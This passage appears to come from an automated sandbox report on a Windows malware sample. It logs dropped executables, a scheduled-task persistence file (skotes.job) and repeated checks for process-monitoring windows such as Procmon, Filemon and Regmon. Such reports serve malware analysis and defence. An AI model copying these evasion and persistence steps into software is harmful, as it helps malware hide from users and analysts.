Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\null[1]	Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\null[1]	Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\null[2]	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\Desktop\1w5RpHuliE.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
